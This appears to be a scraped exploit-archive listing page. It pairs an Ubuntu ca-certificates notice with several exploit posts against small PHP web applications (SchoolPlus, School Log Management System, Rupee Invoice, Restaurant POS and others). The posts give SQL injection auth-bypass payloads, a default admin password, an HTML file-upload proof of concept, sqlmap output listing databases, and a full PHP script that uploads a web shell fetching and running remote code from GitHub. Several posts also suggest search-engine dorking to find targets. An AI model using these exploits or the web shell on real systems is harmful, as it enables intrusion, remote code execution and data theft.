pgAdmin versions 8.11 and earlier are vulnerable to a security flaw in OAuth2 authentication. This vulnerability allows an attacker to potentially obtain the client ID and secret, leading to unauthorized access to user data.

pgAdmin 8.11 Information Disclosure

Ubuntu Security Notice 7034-2 - USN-7034-1 updated ca-certificates. This update provides the corresponding update for Ubuntu 16.04 LTS and Ubuntu 18.04 LTS. The ca-certificates package contained outdated CA certificates. This update refreshes the included certificates to those contained in the 2.64 version of the Mozilla certificate authority bundle.

==========================================================================  
Ubuntu Security Notice USN-7034-2  
September 26, 2024

ca-certificates update  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 18.04 LTS  
- Ubuntu 16.04 LTS

Summary:

The CA certificates in the ca-certificates package were updated.

Software Description:  
- ca-certificates: Common CA certificates

Details:

USN-7034-1 updated ca-certificates. This update provides  
the corresponding update for Ubuntu 16.04 LTS and Ubuntu 18.04 LTS.

Original advisory details:

 The ca-certificates package contained outdated CA certificates.  
 This update refreshes the included certificates to those contained  
 in the 2.64 version of the Mozilla certificate authority bundle.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 18.04 LTS  
  ca-certificates                 202402031ubuntu0.18.04.1+esm1  
                                  Available with Ubuntu Pro

Ubuntu 16.04 LTS  
  ca-certificates                 202402031~16.04.1~esm1  
                                  Available with Ubuntu Pro

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-7034-2  
  https://ubuntu.com/security/notices/USN-7034-1  
  https://launchpad.net/bugs/2081875

Ubuntu Security Notice USN-7034-2

SchoolPlus version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : SchoolPlus v1.0 Auth By Pass Vulnerability                                                                                  || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : http://webpay.com.np/#Product                                                                                               |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user & pass = ' or 0=0 ##[+] Panel : http://127.0.0.1/jamiatulamanepal.orgnp/cms/Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

SchoolPlus 1.0 SQL Injection

School Log Management System version 1.0 suffers from a PHP code injection vulnerability.

    =============================================================================================================================================| # Title     : School Log Management System 1.0 code injection Vulnerability                                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/school-log-management-system_1.zip                    |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This payload injects php code of your choice into an SHELL.php file. [+] Line 28    Line 37  [+] change the path of the script folder.[+] save payload as poc.php[+] usage from cmd : C:\www\test>php 1.php 127.0.0.1[+] payload :<?phpfunction file_upload($target_ip) {    $file_name = "indoushka.php";    $webshell_payload = "<?php        \$url = 'https://raw.githubusercontent.com/indoushka/txt/main/indoushka.txt';        \$ch = curl_init();        curl_setopt(\$ch, CURLOPT_URL, \$url);        curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true);        \$output = curl_exec(\$ch);        curl_close(\$ch);        if (\$output) {            include 'data://text/plain;base64,' . base64_encode(\$output);        }    ?>";    $post_fields = array(                'name' => 'Hacked By Indoushka',        'email' => 'indoushka4ever@gmail.com',    'contact' => '00213771818860',    'img' => new CURLFile('data://text/plain;base64,' . base64_encode($webshell_payload), 'application/x-php', $file_name),        'qty' => '1'    );    $ch = curl_init();    curl_setopt($ch, CURLOPT_URL, "http://$target_ip/slms/admin/ajax.php?action=save_settings");    curl_setopt($ch, CURLOPT_POST, 1);    curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);    $response = curl_exec($ch);    curl_close($ch);    echo "(+) Shell uploaded successfully.\n";    echo "(+) Access the shell at: http://$target_ip/slms/admin/assets/uploads/\n";}if ($argc != 2) {    echo "(+) Usage: php " . $argv[0] . " <target ip>\n";    echo "(+) Example: php " . $argv[0] . " 10.0.0.1\n";    exit(-1);}$target_ip = $argv[1];file_upload($target_ip);Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

School Log Management System 1.0 Code Injection

School Dormitory Management System version 1.0 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : School Dormitory Management System v1.0 Insecure Settings Vulnerability                                            || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://www.sourcecodester.com/user/257130/activity                                                                |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin123[+] https://www/127.0.0.1/yoruanwitness000webhostappcom/admin/?page=clientsGreetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

School Dormitory Management System 1.0 Insecure Settings

Sample Blog Site version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

**Sample Blog Site 1.0 SQL Injection**

**Sample Blog Site 1.0 SQL Injection**

Posted Sep 26, 2024

Authored by indoushka

Sample Blog Site version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

tags | exploit, remote, sql injection, bypass

SHA-256 | ff00fa017d6b2c496a8bf995f9b728c45edba03e76532f4e55d8dac49f2ca066

Download | Favorite | View

**Sample Blog Site 1.0 SQL Injection**

    =============================================================================================================================================| # Title     : Sample Blog Site 1.0 auth by pass Vulnerability                                                                             || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-simple-ims.zip                                    |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : ' or 0=0 ##[+] http://127.0.0.1/blog/admin/index.php?page=homeGreetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Sample Blog Site 1.0 SQL Injection

Rupee Invoice System version 1.0 suffers from an arbitrary file upload vulnerability.

=============================================================================================================================================  
| # Title     : Rupee Invoice System v1.0 Remote File Upload Vulnerability                                                                  |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://www.mayurik.com/                                                                                                    |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code uploads a executable malicious file remotely .

[+] Go to the line 7.

[+] Set the target site link Save changes and apply . 

[+] infected file : phpinventory/php_action/createProduct.php.

[+] save code as poc.html .

<!DOCTYPE html>  
<html>  
<head>  
    <title>Create Product</title>  
</head>  
<body>  
    <form action="http://127.0.0.1/phpinventory/php_action/createProduct.php" method="POST" enctype="multipart/form-data">  
        <input type="hidden" name="currnt_date" value="100">

                <label for="productImage">Product Image:</label>  
        <input type="file" name="productImage" id="productImage" required><br><br>

        <input type="submit" name="create" value="Create">  
    </form>  
</body>  
</html>

[+] http://127.0.0.1/phpinventory/assets/myimages/dab.php

Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================

Rupee Invoice System 1.0 Arbitrary File Upload

Restaurant POS version 1.0 suffers from a remote SQL injection vulnerability.

    =============================================================================================================================================| # Title     : Restaurant POS v1.0 SQL injection Vulnerability                                                                             || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.hockeycomputindo.com/2021/05/restaurant-pos-source-code-free.html                                               |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : admin/deletestaff.php?staffID=1[+] E:\sqlmap>python sqlmap.py -u http://127.0.0.1/bangresto-main/admin/deletestaff.php?staffID=1 --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs[+] ---   GET parameter 'staffID' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N   sqlmap identified the following injection point(s) with a total of 1823 HTTP(s) requests:---  Parameter: staffID (GET)    Type: error-based    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)    Payload: staffID=1 AND EXTRACTVALUE(5264,CONCAT(0x5c,0x71787a7171,(SELECT (ELT(5264=5264,1))),0x7162787071))    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: staffID=1 AND (SELECT 3481 FROM (SELECT(SLEEP(5)))frXm)---[22:32:22] [INFO] the back-end DBMS is MySQLweb application technology: PHP 8.0.30, Apache 2.4.58, PHPback-end DBMS: MySQL >= 5.1 (MariaDB fork)[22:32:22] [INFO] fetching database names[22:32:22] [INFO] starting 7 threads[22:32:22] [INFO] retrieved: 'bangresto'[22:32:22] [INFO] retrieved: 'cms'[22:32:22] [INFO] retrieved: 'phpmyadmin'[22:32:22] [INFO] retrieved: 'mysql'[22:32:22] [INFO] retrieved: 'test'[22:32:22] [INFO] retrieved: 'information_schema'[22:32:22] [INFO] retrieved: 'performance_schema'available databases [7]:[*] bangresto[*] ending @ 22:32:22 /2024-08-16/Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Restaurant POS 1.0 SQL Injection

Responsive Binary mlm version 3.2.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : Responsive Binary mlm 3.2.0 Auth By PAss Vulnerability                                                             || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://www.kashipara.com/project/download/project2/user/2023/202312/kashipara.com_responsive-binary-mlm-zip.zip   |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : u&p = ' or 0=0 ##[+] http://127.0.0.1/responsive_binary_mlm/admin/admin_dashboard.phpGreetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Responsive Binary mlm 3.2.0 SQL Injection

Responsive Billing sw System version 3.2.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : Responsive Billing sw System 3.2.0 auth by pass Vulnerability                                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.kashipara.com/project/download/project2/user/2023/202311/kashipara.com_responsive-billing-sw-zip.zip            |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user & pass = ' or 0=0 ##[+] http://127.0.0.1/responsive_billing_sw/index.phpGreetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Tag

#auth